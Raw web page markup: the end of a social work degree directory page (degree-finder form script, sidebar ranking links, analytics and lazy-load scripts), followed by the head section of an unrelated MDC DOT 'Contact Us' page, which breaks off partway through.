&amp; Family Development</option><option value="237">Journalism</option><option value="29">Liberal Arts</option><option value="280">Media Communications</option><option value="258">Ministry</option><option value="236">Music</option><option value="154">Political Science</option><option value="45">Public Administration</option><option value="186">Public Policy</option><option value="47">Social Science</option><option value="152">Social Work</option><option value="85">Sociology</option><option value="78">Theology</option><option value="203">Writing</option></optgroup><optgroup label="Nursing &amp; Healthcare"><option value="206">Dental Assistance</option><option value="198">Emergency Management</option><option value="72">Gerontology</option><option value="199">Health Education</option><option value="59">Health Informatics</option><option value="83">Health Science</option><option value="148">Health Services</option><option value="5">Healthcare Administration</option><option value="231">Healthcare Management</option><option value="67">Human Services</option><option value="105">Medical Assisting</option><option value="6">Medical Coding</option><option value="207">Medical Office Administration</option><option value="283">Nurse Practitioner (RN Required)</option><option value="89">Nursing (RN required)</option><option value="300">Nursing Education (RN Required)</option><option value="96">Nutritional Sciences</option><option value="101">Pharmacy</option><option value="160">Public Health</option><option value="204">RN to BSN (RN required)</option><option value="276">Sports Medicine</option><option value="55">Sports Medicine/Physical Therapy</option><option value="165">Veterinary</option><option value="219">X-Ray Technician</option></optgroup><optgroup label="Psychology &amp; Counseling"><option value="298">Addictions &amp; Recovery</option><option value="289">Behavioral Psychology</option><option value="257">Child and Adolescent Psychology</option><option value="66">Counseling</option><option value="290">Educational Psychology</option><option value="294">Family Counseling</option><option value="209">Forensic Psychology</option><option value="286">Organizational Psychology</option><option value="18">Psychology</option></optgroup><optgroup label="Science &amp; Engineering"><option value="238">Aeronautics/Aviation</option><option value="292">Biomedical Engineering</option><option value="168">Civil Engineering</option><option value="268">Drafting</option><option value="139">Electronics Engineering</option><option value="150">Engineering</option><option value="288">Engineering Management</option><option value="142">Environmental Management</option><option value="158">Environmental Science</option><option value="196">Industrial Engineering</option><option value="197">Mechanical Engineering</option></optgroup><optgroup label="Trades &amp; Careers"><option value="144">Automotive</option><option value="264">Carpentry</option><option value="90">Construction Management</option><option value="259">Culinary</option><option value="218">Electrical Technician</option><option value="141">Fire Science</option><option value="217">Heating/Cooling</option><option value="145">Technology</option><option value="143">Trades</option></optgroup></select></label></div><button type="submit" class="css-b9e76i">Search Now</button><small class="css-1ga7xs5">Sponsored Schools</small><input type="hidden" name="publisher" value="socialworkdegreecenter.com"/><input type="hidden" name="url"/></form></div> <script>(function(){var e=this.element,n=this.props;if(e){e.setAttribute("data-ssr-mounted","");var t=e.querySelector("select[name=degree]"),i=e.querySelector("select[name=category]"),r=e.querySelector("select[name=subject]"),a=r.querySelectorAll("optgroup"),o=e.querySelector("[name=url]"),c=t.children[0].label,l=i.children[0].label,u=r.children[0].label,d=window.self!==window.top;o.value=d?document.referrer:window.location.href;for(var s=[],g=[],m=[],h=1;h<t.length;h++)s.push({name:t[h].label,id:t[h].value,selected:t[h].selected});for(var y=1;y<i.length;y++)g.push({name:i[y].label,id:i[y].value,selected:i[y].selected,degree:s.map(function(e){return e.id})});for(var f=0;f<a.length;f++){for(var p=void 0,b=0;b<g.length;b++)g[b].name===a[f].label&&(p=g[b].id);for(var v=0;v<a[f].children.length;v++){var x=a[f].children[v];m.push({name:x.label,id:x.value,selected:x.selected,category:p,degree:s.map(function(e){return e.id})})}}t.addEventListener("change",j),i.addEventListener("change",H),r.addEventListener("change",M);var w="".concat("https://platform.highereducation.com/","api"),S="\n query QuickDegreeFinderFeed($publisher: String!) {\n quickDegreeFinder(publisher: $publisher) {\n degrees {\n id\n name\n slug\n categories {\n id\n name\n slug\n subjects {\n id\n name\n slug\n }\n }\n }\n }\n }\n ",E={publisher:n&&n.publisher};P("".concat(w,"?query=").concat(encodeURIComponent(S),"&variables=").concat(encodeURIComponent(JSON.stringify(E))),function(e){var n,t,i=JSON.parse(e).data,r=i&&i.quickDegreeFinder&&i.quickDegreeFinder.degrees;if(r||!r.length){n=r.reduce(function(e,n){return n.categories.forEach(function(t){e[t.id]=e[t.id]||t,e[t.id].degree=e[t.id].degree||[],e[t.id].degree.push(n.id)}),e},{}),n=Object.keys(n).map(function(e){return n[e]}),t=r.reduce(function(e,n){return n.categories.forEach(function(t){t.subjects.forEach(function(i){e[i.id]=e[i.id]||i,e[i.id].category=e[i.id].category||t.id,e[i.id].degree=e[i.id].degree||[],e[i.id].degree.push(n.id)})}),e},{}),t=Object.keys(t).map(function(e){return t[e]});var a=s.filter(function(e){return e.selected}),o=g.filter(function(e){return e.selected}),c=m.filter(function(e){return e.selected});s=r.map(function(e){return e.selected=a[0]&&a[0].id==e.id||!1,e}),g=n.map(function(e){return e.selected=o[0]&&o[0].id==e.id||!1,e}).sort(function(e,n){return e.name<n.name?-1:e.name>n.name?1:0}),m=t.map(function(e){return e.selected=c[0]&&c[0].id==e.id||!1,e}).sort(function(e,n){return e.name<n.name?-1:e.name>n.name?1:0}),j()}else console.error("Problem loading QDF feed.")})}function k(){return'\n <option value="">'.concat(c,"</option>\n ").concat(s.map(function(e){return"\n <option ".concat(e.selected?"selected":"",' value="').concat(e.id,'">').concat(e.name,"</option>\n ")}).join(""),"\n ")}function C(e,n){return'\n <option value="">'.concat(e,"</option>\n ").concat(n.map(function(e){return"\n <option ".concat(e.selected?"selected":"",' value="').concat(e.id,'">').concat(e.name,"</option>\n ")}).join(""),"\n ")}function O(e,n,i){var r=t.selectedIndex>0?n.filter(function(e){var n;return e.degree.forEach(function(e){t[t.selectedIndex].value==e&&(n=!0)}),n}):n,a=[].concat(i).map(function(e){return e.subjects=r.filter(function(n){return n.category===e.id}),e});return'\n <option value="">'.concat(e,"</option>\n ").concat(a.map(function(e){return'\n <optgroup label="'.concat(e.name,'">\n ').concat(e.subjects.map(function(e){return"\n <option ".concat(e.selected?"selected":"",' value="').concat(e.id,'">').concat(e.name,"</option>\n ")}).join(""),"\n </optgroup>\n ")}).join(""),"\n ")}function j(e){var n=e&&e.target&&e.target.value;e&&e.target&&(s=s.map(function(e){return e.selected=e.id==n,e}));var a=n?s.filter(function(e){return e.selected}):s,o=g.filter(function(e){var n;return e.degree.forEach(function(e){a.forEach(function(t){e===t.id&&(n=!0)})}),n});t.innerHTML=k(c,s),i.innerHTML=C(l,o),o=i.selectedIndex>0?g.filter(function(e){return e.selected}):o,r.innerHTML=O(u,m,o)}function H(e){var n=e&&e.target&&e.target.value;g=g.map(function(e){return e.selected=e.id==n,e});var t=n?g.filter(function(e){return e.selected}):g;r.innerHTML=O(u,m,t)}function M(e){var n=e&&e.target&&e.target.value;m=m.map(function(e){return e.selected=e.id==n,e})}function P(e,n){var t=new XMLHttpRequest;t.onreadystatechange=function(){4==t.readyState&&200==t.status&&n(t.responseText)},t.open("GET",e,!0),t.send(null)}}).call({ element: document.querySelector("[class=ssr-qdf-cf65b020-77d8-11e9-a3d2-374b8cd52a9e]:not([data-ssr-mounted])"), props: {"backgroundColor":"#37b8eb","cta":"Search Now","ctaColor":"#d0323e","height":"325","title":"Find Your Degree","titleColor":"#266586","publisher":"socialworkdegreecenter.com","url":"https://www.socialworkdegreecenter.com/"} })</script> <script async src="https://platform.highereducation.com/widgets.js"></script> </div></div></div><section id="text-3" class="widget widget_text mb-double"><p class="sidebar-title small-title">Social Work Degree Rankings</p><div class="textwidget"><a href="https://www.socialworkdegreecenter.com/best-online-accredited-social-work-degree-programs/">The 50 Best Online Accredited Social Work Degree Programs</a><br><a href="https://www.socialworkdegreecenter.com/fastest-online-master-social-work-degree-programs/">The 30 Fastest Online Master of Social Work Degree Programs</a><br> <a href="https://www.socialworkdegreecenter.com/best-international-social-work-degree-programs/">The 15 Best International Social Work Degree Programs</a><br><a href="https://www.socialworkdegreecenter.com/top-global-social-work-certificate-programs/">The Top 15 Global Social Work Certificate Programs</a><br> <a href="https://www.socialworkdegreecenter.com/top-msw-programs-child-welfare-careers/">The Top 15 MSW Programs for Child Welfare Careers</a><br> <a href="https://www.socialworkdegreecenter.com/best-online-associate-human-social-services-degrees/">10 Best Online Associate in Human and Social Services Degrees</a><br> <a href="https://www.socialworkdegreecenter.com/ranking-online-masters-in-social-work-msw/" >Top 20 Online MSW Programs</a><br> <a href=”https://www.socialworkdegreecenter.com/top-best-cswe-accredited-online-msw-degree-programs/”>The Top Ten Best CSWE Accredited MSW Degree Programs</a> <a href="https://www.socialworkdegreecenter.com/top-accredited-msw-programs-on-campus/">Top 10 Accredited MSW Programs (On-Campus)</a><br> <a href="https://www.socialworkdegreecenter.com/best-accredited-online-social-work-degree-programs/">10 Best Accredited Online Social Work Degree Programs </a><br> <a href="https://www.socialworkdegreecenter.com/top-accredited-online-masters-social-work-degree-programs/">The Top 15 Accredited Online Masters of Social Work Degree Programs</a><br> <a href="https://www.socialworkdegreecenter.com/top-best-cswe-accredited-online-msw-degree-programs/">The Top Ten Best CSWE Accredited Online MSW Degree Programs</a><br> <a href="https://www.socialworkdegreecenter.com/best-cswe-accredited-online-bachelors-degree-programs/">The 15 Best CSWE Accredited Online Bachelor's Degree Programs</a><br> <a href="https://www.socialworkdegreecenter.com/top-online-bachelors-degrees-in-social-work/">The Top 15 Online Bachelor's Degrees In Social Work</a><br> <a href="https://www.socialworkdegreecenter.com/top-online-social-work-bachelors-degree-programs/">Top 10 Online Social Work Bachelor’s Degree Programs</a><br> <a href="https://www.socialworkdegreecenter.com/best-accredited-online-bsw-programs/">10 Best Accredited Online BSW Programs</a><br> <a href="https://www.socialworkdegreecenter.com/top-online-social-work-bachelors-degree-programs/">The Top 20 Online Social Work Bachelor's Degree Programs</a><br> <a href="https://www.socialworkdegreecenter.com/the-best-campus-based-social-work-schools/">10 Best Campus Based Social Work Schools</a><br></div></section><section id="text-6" class="widget widget_text mb-double"><p class="sidebar-title small-title">Features</p><div class="textwidget"><a href="https://www.socialworkdegreecenter.com/social-worker-spotlight-interviews/">Social Worker Spotlight: Interviews</a><br><a href="https://www.socialworkdegreecenter.com/10-places-volunteer-youre-interested-career-social-work/">10 Places To Volunteer If You're Interested In A Career In Social Work</a><br><a href="https://www.socialworkdegreecenter.com/10-famous-people-social-work-degrees/">10 Famous People Who Have Social Work Degrees</a><br><a href="https://www.socialworkdegreecenter.com/10-common-misconceptions-poor/">10 Common Misconceptions About The Poor</a><br><a href="https://www.socialworkdegreecenter.com/30-beautiful-modern-community-centers-world/"> 30 Most Beautiful Modern Community Centers In The World</a><br><a href="https://www.socialworkdegreecenter.com/10-celebrities-you-didnt-know-were-adopted/"> 10 Celebrities You Didn't Know Were Adopted</a><br><a href="https://www.socialworkdegreecenter.com/10-worst-cases-welfare-fraud-ever-far/">10 Worst Cases of Welfare Fraud Ever (So Far)</a><br><a href="https://www.socialworkdegreecenter.com/social-work-degree-scholarships-grants-loans/">Social Work Degree Scholarships, Grants, and Loans</a> <br><a href="https://www.socialworkdegreecenter.com/features/">...View More</a><br></div></section><section id="text-8" class="widget widget_text mb-double"><p class="sidebar-title small-title">Social Work Careers</p><div class="textwidget"><a href="https://www.socialworkdegreecenter.com/20-career-options-for-social-workers-who-have-completed-their-undergrad-and-or-masters-degrees/">20 Career Options For Social Workers Who Have Completed Their Undergrad And/Or Master's Degree</a><a href="https://www.socialworkdegreecenter.com/10-best-international-social-work-job-opportunities/">10 Best International Social Work Job Opportunities</a><br><a href="https://www.socialworkdegreecenter.com/top-5-careers-for-aspiring-social-workers/">Top 5 Careers For Aspiring Social Workers</a><br><a href=" https://www.socialworkdegreecenter.com/careerguide/">Becoming A Social Worker: An Introduction to Careers In Social Work</a><br><a href="https://www.socialworkdegreecenter.com/top-10-free-classes-available-online-for-social-work-majors-professionals//">The Top 10 Free Classes Available For Social Work Majors & Professionals</a><br><a href="https://www.socialworkdegreecenter.com/private-social-work-jobs/">Private Social Work Jobs</a><br><a href="https://www.socialworkdegreecenter.com/careers/">...View More </a><br></div></section><section id="text-5" class="widget widget_text mb-double"><p class="sidebar-title small-title">Frequently Asked Questions</p><div class="textwidget"><a href="https://www.socialworkdegreecenter.com/what-can-i-do-with-a-social-work-degree/"> What Can I Do With a Social Work Degree?</a><br><a href=" https://www.socialworkdegreecenter.com/what-can-i-do-with-an-associates-degree-in-social-work/">What Can I Do With an Associate's Degree in Social Work? </a><br><a href="https://www.socialworkdegreecenter.com/what-can-i-do-with-a-bachelors-in-social-work/">What Can I do With a Bachelor's In Social Work?</a><br><a href="https://www.socialworkdegreecenter.com/what-jobs-can-i-do-with-my-masters-degree-in-social-work/"> What Can I Do With a Masters In Social Work?</a><br><a href="https://www.socialworkdegreecenter.com/child-welfare-social-work/">What is Child Welfare Social Work?</a><br><a href="https://www.socialworkdegreecenter.com/child-welfare-certificate-programs/">What are Child Welfare Certificare Programs</a><br><a href="https://www.socialworkdegreecenter.com/best-international-social-work-degree-programs-abroad/">What Are The Best Social Work Degree Programs Abroad?</a><a href="https://www.socialworkdegreecenter.com/where-can-i-find-the-best-jobs-after-i-complete-my-lcsw/">Where Can I Find the Best Jobs After I Complete My LCSW?</a><a href="https://www.socialworkdegreecenter.com/frequently-asked-questions/">...View More</a><br> <script src="//pmetrics.performancing.com/js" type="text/javascript"></script> <script type="text/javascript">try{ clicky.init(21150); }catch(e){}</script> <noscript><p><img alt="Performancing Metrics" width="1" height="1" src="//pmetrics.performancing.com/21150ns.gif" /></p></noscript></div></section><section id="search-2" class="widget widget_search mb-double"><form role="search" method="get" id="searchform" class="search-form form-attached clear" action="https://www.socialworkdegreecenter.com/"><input type="search" class="search-input form-input" placeholder="To search, type and hit enter&hellip;" value="" name="s" id="s" /><button type="submit" class="search-submit form-submit md-icon md-icon-search" id="searchsubmit" /></button></form></section></aside></div><footer class="footer format-text-main" itemscope itemtype="http://schema.org/WPFooter"><div class="inner"><div class="footer-copy mb-double text-center"><div id="text-9" class="widget widget_text"><div class="textwidget"><p>© 2018-2019 <a href="https://www.socialworkdegreecenter.com">Social Work Degree Center</a> / <a href="https://www.socialworkdegreecenter.com/sitemap/" target="_blank" rel="noopener noreferrer">Sitemap</a> {<a href="https://www.socialworkdegreecenter.com/sitemap.xml" target="_blank" rel="noopener noreferrer">XML</a>}</p></div></div></div></div></footer> <script type="text/javascript">jQuery(document).ready(function($){ if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) { $( "#degree-finder" ).insertBefore( ".content-item-text" ); } });</script> <script type='text/javascript' src='https://socialworkdegreecenter.azureedge.net/wp-content/themes/marketers-delight/lib/assets/apollo.js'></script> <script>window.lazyLoadOptions = { elements_selector: "img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]", data_src: "lazy-src", data_srcset: "lazy-srcset", data_sizes: "lazy-sizes", skip_invisible: false, class_loading: "lazyloading", class_loaded: "lazyloaded", threshold: 300, callback_load: function(element) { if ( element.tagName === "IFRAME" && element.dataset.rocketLazyload == "fitvidscompatible" ) { if (element.classList.contains("lazyloaded") ) { if (typeof window.jQuery != "undefined") { if (jQuery.fn.fitVids) { jQuery(element).parent().fitVids(); } } } } }}; window.addEventListener('LazyLoad::Initialized', function (e) { var lazyLoadInstance = e.detail.instance; if (window.MutationObserver) { var observer = new MutationObserver(function(mutations) { mutations.forEach(function(mutation) { for (i = 0; i < mutation.addedNodes.length; i++) { if (typeof mutation.addedNodes[i].getElementsByTagName !== 'function') { return; } if (typeof mutation.addedNodes[i].getElementsByClassName !== 'function') { return; } imgs = mutation.addedNodes[i].getElementsByTagName('img'); iframes = mutation.addedNodes[i].getElementsByTagName('iframe'); rocket_lazy = mutation.addedNodes[i].getElementsByClassName('rocket-lazyload'); if ( 0 === imgs.length && 0 === iframes.length && 0 === rocket_lazy.length ) { return; } lazyLoadInstance.update(); } } ); } ); var b = document.getElementsByTagName("body")[0]; var config = { childList: true, subtree: true }; observer.observe(b, config); } }, false);</script><script data-no-minify="1" async src="https://socialworkdegreecenter.azureedge.net/wp-content/plugins/wp-rocket/assets/js/lazyload/11.0.6/lazyload.min.js"></script><script>function lazyLoadThumb(e){var t='<img data-lazy-src="https://i.ytimg.com/vi/ID/hqdefault.jpg" width="480" height="360"><noscript><img src="https://i.ytimg.com/vi/ID/hqdefault.jpg" width="480" height="360"></noscript>',a='<div class="play"></div>';return t.replace("ID",e)+a}function lazyLoadYoutubeIframe(){var e=document.createElement("iframe"),t="https://www.youtube.com/embed/ID?autoplay=1";t+=0===this.dataset.query.length?'':'&'+this.dataset.query;e.setAttribute("src",t.replace("ID",this.dataset.id)),e.setAttribute("frameborder","0"),e.setAttribute("allowfullscreen","1"),this.parentNode.replaceChild(e,this)}document.addEventListener("DOMContentLoaded",function(){var e,t,a=document.getElementsByClassName("rll-youtube-player");for(t=0;t<a.length;t++)e=document.createElement("div"),e.setAttribute("data-id",a[t].dataset.id),e.setAttribute("data-query", a[t].dataset.query),e.innerHTML=lazyLoadThumb(a[t].dataset.id),e.onclick=lazyLoadYoutubeIframe,a[t].appendChild(e)});</script> <script>document.getElementById( 'header-menu-trigger' ).onclick = function( e ) { apollo.toggleClass( document.getElementById( 'header' ), 'has-mobile-menu' ); apollo.toggleClass( this, 'md-icon-cancel' ); }</script> <noscript><link rel='stylesheet' id='marketers-delight-google-fonts-css' href='https://fonts.googleapis.com/css?family=Cabin%3Anormal%2C%7CRoboto+Condensed&#038;ver=5.2' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='marketers-delight-design-css' href='https://socialworkdegreecenter.azureedge.net/wp-content/themes/marketers-delight/design.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='marketers-delight-css' href='https://socialworkdegreecenter.azureedge.net/wp-content/themes/marketers-delight/style.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wp-block-library-css' href='https://cdn.jsdelivr.net/gh/WordPress/[email protected]/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='hide_updates_css-css' href='https://cdn.jsdelivr.net/wp/hide-updates/tags/1.1.3/hide-updates.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='chld_thm_cfg_child-css' href='https://socialworkdegreecenter.azureedge.net/wp-content/cache/busting/1/wp-content/themes/marketers-delight-child/style-1.0.1532624220.css' type='text/css' media='all' /></noscript><noscript><link rel="stylesheet" href="https://www.socialworkdegreecenter.com/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes-core.css" type="text/css" /></noscript><noscript><link rel="stylesheet" href="https://www.socialworkdegreecenter.com/wp-content/plugins/graceful-pull-quotes/styles/Default.css" type="text/css" /></noscript></body></html> <!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1558010868 -->
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# article: http://ogp.me/ns/article#"> <head> <meta charset="UTF-8" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.mdcdot.com/xmlrpc.php" /> <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"> <title>MDC DOT | Contact Us</title> <script type="application/javascript">var qodeCoreAjaxUrl = "http://www.mdcdot.com/wp-admin/admin-ajax.php"</script> <meta name="description" content="We’d love to hear from you." /> <meta property="og:type" content="article" /> <meta property="og:title" content="MDC DOT | Contact Us" /> <meta property="og:description" content="We’d love to hear from you." /> <meta property="og:url" content="http://www.mdcdot.com/" /> <meta property="og:image" content="http://mdcdot.com/wp-content/uploads/2017/01/Default-MDC-OpenGraph.jpg" /> <meta property="article:published_time" content="2015-10-22" /> <meta property="article:modified_time" content="2018-04-24" /> <meta property="og:site_name" content="MDC DOT" /> <meta name="twitter:card" content="summary" /> <link rel='dns-prefetch' href='//maps.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="MDC DOT &raquo; Feed" href="http://www.mdcdot.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="MDC DOT &raquo; Comments Feed" href="http://www.mdcdot.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.mdcdot.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='layerslider-css' href='http://www.mdcdot.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.1.0' type='text/css' media='all' /> <link rel='stylesheet' id='ls-google-fonts-css' href='http://fonts.googleapis.com/css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://www.mdcdot.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.mdcdot.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.3.1.5' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='qode_startit_default_style-css' href='http://www.mdcdot.com/wp-content/themes/startit/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_modules_plugins-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/plugins.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_modules-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/modules.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qodef_font_awesome-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/font-awesome/css/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qodef_font_elegant-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/elegant-icons/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qodef_ion_icons-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/ion-icons/css/ionicons.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qodef_linea_icons-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/linea-icons/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qodef_simple_line_icons-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/simple-line-icons/simple-line-icons.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qodef_dripicons-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/dripicons/dripicons.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_modules_responsive-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/modules-responsive.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_blog_responsive-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/blog-responsive.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_style_dynamic_responsive-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/style_dynamic_responsive.css?ver=1514308772' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_style_dynamic-css' href='http://www.mdcdot.com/wp-content/themes/startit/assets/css/style_dynamic.css?ver=1514308772' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='http://www.mdcdot.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.0.1' type='text/css' media='all' /> <link rel='stylesheet' id='qode_startit_google_fonts-css' href='https://fonts.googleapis.com/css?family=Raleway%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRaleway%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Condensed%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;subset=latin%2Clatin-ext&#038;ver=1.0.0' type='text/css' media='all' /> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/themes/startit/assets/js/scrolltoplugin.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var LS_Meta = {"v":"6.1.0"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedia.jquery.js?ver=6.1.0'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.js?ver=6.1.0'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.3.1.5'></script> <script type='text/javascript' src='http://www.mdcdot.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.3.1.5'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian 